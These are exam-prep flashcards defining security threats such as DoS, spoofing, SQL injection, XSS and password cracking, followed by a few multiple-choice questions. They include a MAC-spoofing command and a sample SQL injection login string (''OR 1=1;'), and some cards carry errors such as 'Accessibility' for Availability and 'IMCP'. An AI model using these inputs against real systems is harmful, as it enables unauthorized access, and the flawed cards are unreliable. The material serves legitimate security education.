Threat & Vulnerabilities Flashcards
Person or event with the potential to have an impact on a valuable resource
Threat
Flaw or weakness within a system that can be exploited. Quality within a resource or its environment that might allow a threat to be realized
Vulnerability
The likelihood of a threat exploiting a vulnerability
Risk
Act of protecting data and information from unauthorized access, unlawful modification and disruption, disclosure, and corruption, and destruction
Information Security
Threat that originates within the organization
Internal / Insider Threat
The act of protecting the systems that hold and process critical data, the device holding the data
Information System Security
CIA Triad
Confidentiality
Integrity
Availability
Threats that are external to an organization
External Threat
List of publicly disclosed computer security weaknesses
CVE (Common Vulnerabilities and Exposure)
Vulnerability that is discovered or exploited before the vendor can issue a patch to fix it
Zero-day vulnerability
Software code that takes advantage of a security flaw or vulnerability
Exploit
Confidentiality protections such as looked doors, fences, security guards, security cameras, and safes are examples of what type of protection?
Physical protections
Confidentiality protections such as encryption, passwords, firewalls, and MFA are examples of what type of protection?
Electronic protections
2 best methods for integrity
1) Hashing
2) Checksums
A file that goes through a one way encryption algorithm that gives a unique digital fingerprint to the file
Hashing
Occurs when the data is modified during storage, at rest, or transit.
Failure of integrity
Having good backup strategies and disaster recovery plans ensure which one of the CIA triad?
Availability
3 main things to remember when regarding CIA triad
Confidentiality – Encryption (like WPA2)
Integrity – Hashing (like MD5, SHA-1)
Accessibility – Redundancy & reliability
System that is not on the baseline of what is approved by the organization.
(Configuration baseline is a set of recommendations for deploying a computer in a hardened configuration)
System that is not compliant in the configuration baseline.
Non-compliant System
5 main vulnerabilities to network and systems
1) Non-compliant systems
2) Unpatched systems
3) Unprotected systems
4) EOL (End-of-Life) OSs
5) BYOD (Bring your own device)
An attack that attempts to make a computer or server’s resources unavailable
Denial of Service (DoS)
Specialized type of DoS attack that attempts to send more packets to a server or host
Flood attack
Type of flood DoS attack that happens when too many pings (IMCP echo) are being sent
Ping Flood
Type of flood DoS attack where the attacker initiates multiple TCP sessions but never completes the three-way handshake
SYN Flood
3 ways to prevent DoS attacks
1) Flood Guards
2) Time Outs
3) Intrusion Prevention
Type of DoS attack that exploits a security flaw to permanently break a networking device by reflashing its firmware
Permanent Denial of Service (PDoS)
Attack that creates a large number of processes to use up the available processing power of a computer
Fork Bomb
Uses lots of machines to attack a server to create a DoS
Distributed Denial of Service (DDoS)
Type of DDoS attack that allows an attacker to send packets to flood the victim’s website to initiate DNS requests
DNS Amplification
A way to prevent a DoS attack that identifies attacking IP addresses and routes them to a non-existent server through the null interface
Blackhole/Sinkhole
A way to prevent a DoS attack that identifies and responds to small-scale DoS attacks
Intrusion Prevention
A way to prevent a DDoS attack that scales up when demand increases
Elastic Cloud Infrastructure
(companies such as Cloudflare and Akamai)
3 main spoofing attacks
1) IP spoofing
2) MAC spoofing
3) ARP spoofing
Attack that occurs when an attacker masquerades as another person by falsifying their identity electronically
Spoofing
Spoof that modifies the source address of an IP packet to hide the identity of the sender or impersonate another client
IP spoofing
What layer of the OSI model is IP spoofing apart of?
Layer 3
What layer of the OSI model is MAC spoofing apart of?
Layer 2
Attacker changes the MAC address to pretend the use of a different network interface card or device
MAC spoofing
Relies on a list of all known and authorized MAC addresses
MAC Filtering
Command to spoof a MAC address
sudo ifconfig en0 ether <MAC></MAC>
Type of spoof attack where the attacker sends falsified ARP messages over a local area network
ARP spoofing
Occurs when an attacker puts themself between the victim and the intended destination
On-Path attack
Ways to produce an On-Path attack
1) ARP poisoning
2) DNS poisoning
3) Introducing a rogue WAP (Wireless access point)
4) Introducing rogue hub/switch
During an on-path attack happens, occurs when valid data is captured by the attacker and is then repeated immediately, or delayed, and the repeated
Replay
During an on-path attack happens, occurs when the attacker inserts themself between the two hosts
Relay
Occurs when an attacker tricks the encryption application into presenting the user with an HTTP connection instead of an HTTPS connection (to bypass secure encryption)
SSL Stripping
Occurs when an attacker attempts to have a client or server abandon a higher security mode in favor of a lower security mode
Downgrade attack
SQL stand for
Structured Query Language
An attack consisting of the insertion or injection of an SQL query via input data from the client to a web application
SQL Injection
Insertion of additional information or code through data input from a client to an application
Injection attack
4 Common types of Injection attacks
1) SQL (most common)
2) HTML
3) XML
4) LDAP
Example of SQL injection (returns value of True)
Typical:
username: Jason
password: pass123
SQL Injection
username: Jason
password: ‘OR 1=1;
How can SQL injection be prevented? (2)
1) Input validation
2) Least privilege
Attack occurs when an attacker embeds malicious scripting commands on a trusted website
Cross-Site Scripting (XSS)
3 types of Cross-Site Scripting (XSS) attacks
1) Stored/Persistent
2) Reflected
3) DOM-based
Type of XXS attack that attempts to get data provided by the attacker to be saved on the web server by the victim
Stored/Persistent
Type of XXS attack that attempts to have a non-persistent effect activated by a victim clicking a link on the site
Reflected
Type of XXS attack that attempts to exploit the victim’s web browser
Document Object Model (DOM)-based
How to prevent XSS attacks? (2)
1) Output encoding
2) Proper input validation
Attack that occurs when an attacker forces the user to execute actions on a web server for which they are already authenticated
Cross-Site Request Forgery (XSRF/CSRF)
How to prevent XSRF? (4)
1) Tokens
2) Encryption
3) XML file scanning
4) Cookie verification
Tool used to test the strength of passwords to ensure password policies are being followed properly
Password Analysis tool
Uses comparative analysis to break passwords and systematically continues guessing until the password is determined
Password Cracker
2 most well know password crackers
1) Cain & Abel
2) John the Ripper
4 types of password cracking methods
1) Password Guessing
2) Dictionary Attack
3) Brute-force Attack
4) Cryptanalysis Attack
Type of password cracking attack that occurs when a weak password is simply figured out by a person
Password Guessing
Type of password cracking attack method where a program attempts to guess the password by using a list of possible passwords (lots common passwords)
Dictionary Attack
Type of password cracking attack method where a program attempts to try every possible combination until it cracks the password (counts from 000 to 001 to 002)
Brute-Force attack
Type of password cracking attack that compares a precomputed encrypted password to a value in a lookup table / rainbow table
Cryptanalysis Attack
(No longer included in exam)
Type of password cracking attack that attempts to crack a password by threatening or causing a person physical harm in order to make them tell you the password
Rubber Hose Attack
An employee or other trusted insider who uses their authorized network access in unauthorized ways to harm the company
Insider Threat
A specific type of malware that is tied to either a logical event or a specific time (like entering a code every 24 hours)
Logic Bomb
Which type of threat actor can accidentally or inadvertently cause a security incident in your organization?
a) Hacktivist
b) Insider threat
c) Organized Crime
d) APT (advanced persistent threats)
b) Insider threat
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?
a) SQL injection
b) Cross-site scripting
c) Buffer overflow
d) Denial of Service
a) SQL injection
*SQL injection is a type of attack where malicious SQL code is inserted into a web application’s input fields, such as search boxes or login forms, in order to manipulate the database. If the application does not properly validate or sanitize user input, the attacker could exploit this vulnerability to: Retrieve unauthorized data from the database.
Expose sensitive information such as passwords, personal details, or other confidential records. Potentially modify or delete data, depending on the severity of the vulnerability. This attack directly targets the database and could lead to inadvertent disclosure of sensitive information, especially if the attacker successfully exploits the vulnerability to retrieve private or restricted data.
Why the other attacks are less likely for inadvertent disclosure:
b) Cross-site scripting (XSS): XSS attacks primarily target the users of a website, not the database. They allow attackers to inject malicious scripts into web pages viewed by other users, which could lead to the theft of cookies or session tokens, but not necessarily database information.
c) Buffer overflow: This attack generally targets vulnerabilities in a program’s memory and can lead to crashes or code execution on the system. While it can be dangerous, its primary goal is not to retrieve data from a database.
d) Denial of Service (DoS): A DoS attack seeks to make a system or service unavailable by overwhelming it with traffic or requests. It does not aim to extract or disclose information from a database but rather to disrupt services.*
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events?
a) SQL injection
b) Rootkit
c) Cross-Site request forgery
d) Cross-Site scripting
d) Cross-Site scripting
